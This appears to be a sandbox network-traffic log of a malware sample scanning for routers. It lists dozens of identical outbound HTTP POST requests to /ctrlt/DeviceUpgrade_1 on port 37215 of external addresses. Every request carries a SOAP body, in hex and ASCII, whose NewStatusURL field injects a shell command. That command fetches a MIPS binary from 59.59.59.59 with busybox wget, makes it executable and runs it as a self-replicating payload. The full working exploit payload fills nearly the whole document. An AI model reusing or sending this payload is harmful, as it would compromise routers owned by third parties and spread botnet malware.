                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          460192.168.2.1552772104.24.60.24037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.578453064 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          461192.168.2.1553322157.220.128.14437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.578797102 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          462192.168.2.1534330157.35.57.11037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.578815937 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          463192.168.2.1548342197.11.20.17837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.579029083 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          464192.168.2.1533100157.54.255.037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.579226971 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          465192.168.2.1537358157.58.240.15237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.579627037 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          466192.168.2.1543806197.107.7.13637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.580885887 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          467192.168.2.155643841.158.95.8537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.581051111 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          468192.168.2.1549578157.131.85.16337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.581068993 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          469192.168.2.1550964170.52.194.25537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.581187963 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
